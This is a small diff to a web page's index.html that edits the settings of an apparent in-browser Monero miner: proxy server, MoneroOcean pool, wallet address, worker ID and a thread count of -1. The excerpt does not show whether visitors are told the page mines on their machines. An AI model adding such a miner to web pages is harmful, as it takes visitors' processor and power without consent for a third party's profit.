--- a/index.html
+++ b/index.html
@@ -26,11 +26,11 @@
 
     server = "wss://f.xmrminingproxy.com:8181";
 
-    var pool = "gulf.moneroocean.stream:20128";
+    var pool = "gulf.moneroocean.stream";
 
     var walletAddress = "48EonXRqcmsNCdiYCvGnUKWyHddmnqCRGCkKdLiHMKjAEFGzYtFd2bNd6XA8SLxqdzNHcrqPNYe2mFFLypfhNATwVGurBqG";
 
-    var workerId = "x"
+    var workerId = "x";
 
     var threads = -1;
 
